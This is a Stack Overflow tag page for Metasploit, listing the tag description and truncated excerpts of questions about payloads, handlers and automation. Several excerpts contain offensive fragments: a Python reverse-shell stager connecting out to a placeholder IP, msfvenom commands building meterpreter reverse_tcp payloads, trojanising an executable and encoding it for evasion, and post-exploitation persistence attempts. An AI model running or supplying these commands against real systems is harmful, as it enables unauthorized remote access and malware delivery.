Stack Overflow
Stack Overflow

Questions tagged [metasploit]

This tag is for questions about *programming* the Metasploit framework, not for using the framework or attacking a specific site.

The Metasploit Framework is an open-source project owned/sponsored by Rapid7 for vulnerability assessment, exploitation development, penetration testing, and many other computer and network security-related tasks.

Since version 3 of the Framework, Metasploit has been written primarily in Ruby. Version 2 and older were written in Perl. The various payloads, stagers, and shellcodes are primarily written in C, assembly, and Java.

Metasploit is developed on Github. Documentation and community forums are available on Rapid7's community site. Questions can also be asked in the #metasploit channel on Freenode.

If your question is about using Metasploit, rather than programming with it, then it should probably go on our sister site Information Security.

If your question is about attacking a specific system, such questions are off-topic on Stack Overflow. They are also off-topic on Information Security unless they demonstrate an understanding of the concepts involved and clearly identify a specific problem.

Also, any issues resulting from using such tools without permission from the target are your own risk; we do not endorse such actions in any way.

228 questions
0
votes
1 answer

Meterpreter not connecting back - Python

I have used msfvenom to create the following python payload: import socket,struct s=socket.socket(2,socket.SOCK_STREAM) s.connect(('MY PUBLIC IP',3930)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)
Rob
  • 115
  • 1
  • 2
  • 10
0
votes
1 answer

Metasploit msfrpcd with database

I have a problem, I want to run Metasploit framework as a service, but it can not connect database if use "msfrpcd" tool. If I use msfconsole and "load msgrpc" is ok. So can you help me connect to the database when I use the "msfrpcd" tool. Thanks…
Olala
  • 3
  • 3
0
votes
2 answers

How to automate Metasploit?

I'm using the following code to automate Metasploit: import os, msfrpc, optparse, sys, subprocess from time import sleep def sploiter(RHOST, LHOST, LPORT, session): client = msfrpc.Msfrpc({}) client.login('msf', '123') ress =…
knobiDev
  • 462
  • 1
  • 5
  • 17
0
votes
1 answer

Meterpreter Handler/listener

i'm a cybersecurity students, i'm not a cracker, scriptkiddy or something like this, i'm working on a python meterpreter's listener, i found a normal tcp reverse handler, it is working with cmd reverse tpc (metasploit), but it is no working with…
Syrion
  • 199
  • 1
  • 2
  • 12
0
votes
1 answer

How to connect to a remote bindshell with forwarding port

I am trying to solve buffer oveflow challenges provided by my school. There is a c program on the server exposed as a service on some port e.g. lets say 2323 Also they have provided bindshell port e.g 2525 and they have mentioned that they rely…
TechJ
  • 512
  • 2
  • 5
  • 16
0
votes
1 answer

Standalone multi/handler reverse_tcp

Sorry for my english. Using metasploit I generated an exploit for windows 7 with windows/shell/reverse_tcp payload. Then I waiting connection using msfconsole: use exploit/multi/handler set PAYLOAD windows/shell/reverse_tcp set LHOST…
toog
  • 3
  • 1
  • 5
0
votes
1 answer

Meterpreter reverse_tcp stager and UUID tracking

I'm trying to create meterpreter/reverse_tcp stager, with UUID tracking, but ~/.msf4/payloads.json isn't created. This is msfvenom command: msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=example.com LPORT=4444…
Silver Zachara
  • 2,901
  • 2
  • 16
  • 22
0
votes
1 answer

Does __NR_socketcall use a random port by default?

I'm not seeing where its setting a port in the code for the payload shell_bind_tcp_random_port $ sudo msfvenom --platform linux -p linux/x86/shell_bind_tcp_random_port -f raw | sctest -vvv -Ss 10000 -G shell-bind-tcp-random.dot graph file…
Sam Roberts
  • 379
  • 6
  • 13
0
votes
2 answers

ERROR: METSVC: Cannot open the service manager(0x00000005)

When an exploit is run the run metsvc command gives an error stating that it cannot open the service manager... Any way around it?... I have tried persistence as well. That too says ERROR in script: operation failed: Access denied?... Any help would…
RJ7
  • 1
  • 1
  • 2
  • 4
0
votes
1 answer

ERROR: you must select an arch for a custom payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 -a x86 R |msfvenom -e -t exe -x minipad.exe -k -o minipad123.exe -e x86/shikata_ga_nai -c 8 Attempting to read payload from STDIN... No platform was selected, choosing…
RJ7
  • 1
  • 1
  • 2
  • 4
0
votes
1 answer

how to generate multi encode payload using metasploit

in the previous version of metasploit we could use this code to generate multi encode payload : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.217.133 LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown…
dez
  • 23
  • 2
  • 5
0
votes
1 answer

HTTP Modules use Cookie/Credentials

I am using Metasploit auxiliary/scanner/http modules like dir_listing, http_login, files_dir.... and for some modules cookie is not required, everything can be testing on the root page. But for some modules, like the scanner, the blind_sql_query you…
aDoN
  • 1,877
  • 4
  • 39
  • 55
0
votes
0 answers

Issue: Browsers Tend to Crash Each Time an Exploit Is Delivering the Payload to the System

I am testing a lot of Flash exploits for variouse versions of Flash on Virtual Machines with Windows 7. Id say that 90% of the exploits I tested (on the correct version and correct browser) made the browser crash before the payload could be…
Max Kossatz
  • 1
  • 2
0
votes
1 answer

How to migrate from Metasploit's MSFENCODE to MSFVENOM?

I've written some custom shellcode that I want to encode using Metasploit's msfvenom. Back when msfencode was still working this is the way the command would have gone: $ echo -ne “\x31…\x80” | sudo msfencode -a x86 -t c -e…
mbigras
  • 7,664
  • 11
  • 50
  • 111
0
votes
1 answer

Metasploit meterpreter session editing files with Vi editor

In meterpreter session after exploiting a system, I wanted to edit a .txt file within meterpreter session opened. I used command: meterpreter > edit mypasswords.txt After that, it opened the Vi editor for editing but I really do not like Vi editor…
ToLearn
  • 1
  • 1
  • 2
1 2 3
15 16